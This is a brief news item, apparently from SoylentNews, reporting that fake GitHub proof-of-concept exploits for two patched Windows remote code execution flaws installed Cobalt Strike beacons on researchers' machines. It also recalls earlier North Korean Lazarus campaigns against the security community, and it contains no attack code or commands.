Hackers Target Windows Security Experts With Fake Exploits
upstart writes:
Instead of getting exploit PoC, they're getting something a lot more sinister:
It's common practice for researchers to publish a PoC [Proof-of-Concept] of recently patched flaws on code repositories, such as GitHub. That way, they can test different solutions among themselves and force admins to apply the fixes as soon as possible.
When Microsoft patched two remote code execution vulnerabilities, tracked as CVE-2022-24500 and CVE-2022-26809, a few PoCs popped up on GitHub, one of them coming from an account named "rkxxz".
However, the PoC turned out to be bogus, and what it did instead was install Cobalt Strike beacons on the researchers' endpoints. [...]
Fake Windows exploits target infosec community with Cobalt Strike:
This is not the first time threat actors have targeted vulnerability researchers and pentesters.
In January 2021, the North Korean Lazarus hacking group targeted vulnerability researchers through social media accounts and zero-day browser vulnerabilities.
In March 2021, North Korean hackers again targeted the infosec community by creating a fake cybersecurity company called SecuriElite (located in Turkey).
In November, the Lazarus hacking conducted another campaign using a trojanized version of the IDA Pro reverse engineering application that installed the NukeSped remote access trojan.
By targeting the infosec community, threat actors not only gain access to vulnerability research the victim may be working on but may also potentially gain access to a cybersecurity company's network.
Read more of this story at SoylentNews.